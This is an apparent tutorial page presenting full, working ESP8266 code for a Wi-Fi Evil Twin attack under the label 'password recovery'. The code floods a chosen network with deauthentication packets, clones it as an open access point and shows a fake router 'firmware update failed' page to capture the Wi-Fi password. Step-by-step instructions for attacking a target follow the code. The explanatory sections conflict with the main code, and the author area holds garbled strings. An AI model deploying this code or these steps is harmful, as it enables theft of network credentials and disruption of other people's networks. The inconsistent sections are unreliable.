Wi-Fi Password Recovery System with ESP8266
Introduction
In this project, we will create a Wi-Fi password recovery system using an ESP8266 microcontroller. This system utilizes Evil Twin and DNS spoofing techniques to mimic a legitimate Wi-Fi network and capture user-submitted credentials. While this project is primarily educational, it highlights important cybersecurity vulnerabilities.
Components Required
- ESP8266 Wi-Fi module
- USB to Serial Adapter (to program the ESP8266)
- Connecting Wires and Breadboard
Full Code
Here is the complete code for the Wi-Fi Password Recovery system:
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266HTTPClient.h>
extern "C" {
#include "user_interface.h"
}
typedef struct
{
String ssid;
uint8_t ch;
uint8_t bssid[6];
} _Network;
const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);
_Network _networks[16];
_Network _selectedNetwork;
void clearArray() {
for (int i = 0; i < 16; i++) {
_Network _network;
_networks[i] = _network;
}
}
String _correct = "";
String _tryPassword = "";
// Default main strings
#define SUBTITLE "ACCESS POINT RESCUE MODE"
#define TITLE "<warning style='text-shadow: 1px 1px black;color:yellow;font-size:7vw;'>⚠</warning> Firmware Update Failed"
#define BODY "Your router encountered a problem while automatically installing the latest firmware update.<br><br>To revert the old firmware and manually update later, please verify your password."
String header(String t) {
String a = String(_selectedNetwork.ssid);
String CSS = "article { background: #f2f2f2; padding: 1.3em; }"
"body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }"
"div { padding: 0.5em; }"
"h1 { margin: 0.5em 0 0 0; padding: 0.5em; font-size:7vw;}"
"input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }"
"label { color: #333; display: block; font-style: italic; font-weight: bold; }"
"nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }"
"nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } "
"textarea { width: 100%; }"
;
String h = "<!DOCTYPE html><html>"
"<head><title><center>" + a + " :: " + t + "</center></title>"
"<meta name=viewport content=\"width=device-width,initial-scale=1\">"
"<style>" + CSS + "</style>"
"<meta charset=\"UTF-8\"></head>"
"<body><nav><b>" + a + "</b> " + SUBTITLE + "</nav><div><h1>" + t + "</h1></div><div>";
return h;
}
String footer() {
return "</div><div class=q><a>© All rights reserved.</a></div>";
}
String index() {
return header(TITLE) + "<div>" + BODY + "</ol></div><div><form action='/' method=post><label>WiFi password:</label>" +
"<input type=password id='password' name='password' minlength='8'></input><input type=submit value=Continue></form>" + footer();
}
void setup() {
Serial.begin(115200);
WiFi.mode(WIFI_AP_STA);
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "d347h320");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
webServer.onNotFound(handleIndex);
webServer.begin();
}
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}
network.ch = WiFi.channel(i);
_networks[i] = network;
}
}
}
bool hotspot_active = false;
bool deauthing_active = false;
void handleResult() {
String html = "";
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
webServer.send(200, "text/html", "<html><head><script> setTimeout(function(){window.location.href = '/';}, 4000); </script><meta name='viewport' content='initial-scale=1.0, width=device-width'><body><center><h2><wrong style='text-shadow: 1px 1px black;color:red;font-size:60px;width:60px;height:60px'>⊗</wrong><br>Wrong Password</h2><p>Please, try again.</p></center></body> </html>");
Serial.println("Wrong password tried!");
} else {
_correct = "Successfully got password for: " + _selectedNetwork.ssid + " Password: " + _tryPassword;
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "d347h320");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
Serial.println("Good password was entered !");
Serial.println(_correct);
}
}
String _tempHTML = "<html><head><meta name='viewport' content='initial-scale=1.0, width=device-width'>"
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"</head><body><div class='content'>"
"<div><form style='display:inline-block;' method='post' action='/?deauth={deauth}'>"
"<button style='display:inline-block;'{disabled}>{deauth_button}</button></form>"
"<form style='display:inline-block; padding-left:8px;' method='post' action='/?hotspot={hotspot}'>"
"<button style='display:inline-block;'{disabled}>{hotspot_button}</button></form>"
"</div></br><table><tr><th>SSID</th><th>BSSID</th><th>Channel</th><th>Select</th></tr>";
void handleIndex() {
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "d347h320");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
if (hotspot_active == false) {
String _html = _tempHTML;
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
_html += "</table>";
if (_correct != "") {
_html += "</br><h3>" + _correct + "</h3>";
}
_html += "</div></body></html>";
webServer.send(200, "text/html", _html);
} else {
if (webServer.hasArg("password")) {
_tryPassword = webServer.arg("password");
if (webServer.arg("deauth") == "start") {
deauthing_active = false;
}
delay(1000);
WiFi.disconnect();
WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
} else {
webServer.send(200, "text/html", index());
}
}
}
void handleAdmin() {
String _html = _tempHTML;
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "d347h320");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
if ( bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
if (_correct != "") {
_html += "</br><h3>" + _correct + "</h3>";
}
_html += "</table></div></body></html>";
webServer.send(200, "text/html", _html);
}
String bytesToStr(const uint8_t* b, uint32_t size) {
String str;
const char ZERO = '0';
const char DOUBLEPOINT = ':';
for (uint32_t i = 0; i < size; i++) {
if (b[i] < 0x10) str += ZERO;
str += String(b[i], HEX);
if (i < size - 1) str += DOUBLEPOINT;
}
return str;
}
unsigned long now = 0;
unsigned long wifinow = 0;
unsigned long deauth_now = 0;
uint8_t broadcast[6] = { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF };
uint8_t wifi_channel = 1;
void loop() {
dnsServer.processNextRequest();
webServer.handleClient();
if (deauthing_active && millis() - deauth_now >= 1000) {
wifi_set_channel(_selectedNetwork.ch);
uint8_t deauthPacket[26] = {0xC0, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x01, 0x00};
memcpy(&deauthPacket[10], _selectedNetwork.bssid, 6);
memcpy(&deauthPacket[16], _selectedNetwork.bssid, 6);
deauthPacket[24] = 1;
Serial.println(bytesToStr(deauthPacket, 26));
deauthPacket[0] = 0xC0;
Serial.println(wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), 0));
Serial.println(bytesToStr(deauthPacket, 26));
deauthPacket[0] = 0xA0;
Serial.println(wifi_send_pkt_freedom(deauthPacket, sizeof(deauthPacket), 0));
deauth_now = millis();
}
if (millis() - now >= 15000) {
performScan();
now = millis();
}
if (millis() - wifinow >= 2000) {
if (WiFi.status() != WL_CONNECTED) {
Serial.println("BAD");
} else {
Serial.println("GOOD");
}
wifinow = millis();
}
}Code Explanation
Libraries Used
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266HTTPClient.h>
The code uses essential libraries for Wi-Fi and web server functionalities.
DNS Server and Web Server Setup
const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
DNSServer dnsServer;
ESP8266WebServer webServer(80);
Here, the ESP8266 is configured to act as both a DNS server and an HTTP web server.
Wi-Fi Network Scanning Function
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}
network.ch = WiFi.channel(i);
_networks[i] = network;
}
}
}
This function scans nearby Wi-Fi networks and stores information like SSID, BSSID, and channel number.
Web Page Handler
void handleIndex() {
String html = "<html><head><title>Wi-Fi Password Recovery</title></head><body>";
html += "<h1>Enter Wi-Fi Password</h1>";
html += "<form method='POST' action='/result'>";
html += "<label>Password:</label>";
html += "<input type='password' name='password'>";
html += "<button type='submit'>Submit</button>";
html += "</form></body></html>";
webServer.send(200, "text/html", html);
}
This section generates an interactive web page where the user can input their Wi-Fi password.
Main Loop
void loop() {
dnsServer.processNextRequest();
webServer.handleClient();
}
In the main loop, the ESP8266 continuously processes DNS and web server requests.
Step-by-Step Guide for Uploading the Code
- Prepare the ESP8266:
- Connect the ESP8266 to the USB to Serial adapter.
- Use the following connections:
- VCC → 3.3V
- GND → GND
- TX → RX (Adapter)
- RX → TX (Adapter)
- GPIO0 → GND (only during uploading).
- Install Arduino IDE:
- Download the latest Arduino IDE from Arduino’s website.
- Install the ESP8266 Board Manager:
- Go to File → Preferences.
- Add the URL:
http://arduino.esp8266.com/stable/package_esp8266com_index.jsonin the Additional Boards Manager URLs. - Open Tools → Board → Boards Manager. Search for “ESP8266” and install it.
- Select the Board and Port:
- In Arduino IDE, go to Tools → Board → Select Generic ESP8266 Module.
- Under Tools → Port, select the correct COM port for your ESP8266.
- Upload the Code:
- Open the code in Arduino IDE.
- Click on the Upload button. Ensure GPIO0 is grounded.
Common Errors and Their Fixes
- Error: Failed to Connect to ESP8266
- Cause: Incorrect wiring or GPIO0 not grounded during upload.
- Fix: Check connections and ensure GPIO0 is grounded.
- Error: “esptool.FatalError: Timed out waiting for packet header”
- Cause: ESP8266 is not in programming mode.
- Fix: Reset the module and recheck wiring.
- Error: Sketch Too Large
- Cause: Code size exceeds available memory.
- Fix: Reduce code size by optimizing libraries or use a different board with more memory.
- Error: “WiFi.h not found”
- Cause: Missing ESP8266 libraries.
- Fix: Reinstall the ESP8266 Board Manager in Arduino IDE.
How to Use
- After uploading the code, disconnect GPIO0 from GND and reset the ESP8266.
- The ESP8266 will create a Wi-Fi hotspot named “Free_WiFi”.
- Connect to this network using any device.
- Open a browser and visit
192.168.1.1. - Enter a password in the form displayed and submit.
- The password will be printed in the Serial Monitor of Arduino IDE.
- Connect to the AP named
WiPhi_34732with passwordd347h320from your phone/PC. - Select the target AP you want to attack (list of available APs refreshes every 30secs – page reload is required).
- Click the Start Deauthing button to start kicking devices off the selected network.
- Click the Start Evil-Twin button and optionally reconnect to the newly created AP named same as your target (will be open).
- You can stop any of the attacks by visiting
192.168.4.1/adminwhile conected to Evil-Twin AP or by resetting the ESP8266. - Once a correct password is found, AP will be restarted with default ssid
WiPhi_34732/d347h320and at the bottom of a table you should be able to see something like “Successfully got password for –TARGET_SSID–PASSWORD- If you power down / hard reset the gathered info will be lost
It doesn’t work for me:
- For starters, I don’t really care – it’s something I did for fun and a POC that worked on my test surface and I do not provide any support for.
- Follow SpaceHuhn and read his blog to learn about the attack.
- If you can offer some input on what you think is wrong feel free to let me know and I will try, at some point, to fix it.
Security Note
This project is for educational purposes only. Never use it to compromise networks or collect passwords without proper authorization. Misuse can lead to legal consequences. Always respect privacy and ethics.
Conclusion
With this project, you learned how to create a Wi-Fi password recovery system, highlighting the vulnerabilities of unsecured networks. Ensure you follow ethical practices while exploring cybersecurity concepts. For more interesting projects, stay connected to our platform!
About The Author
cbriDsK ebNQ Jhlg jvD
Bro i m getting the password but the the deauthor is not deauthing the devices connected to the wifi, please fix this.
Please email me. Thank you.
ndkcIO hIjrn Bqohx dkLONQ HIrwY YGlsgD fPe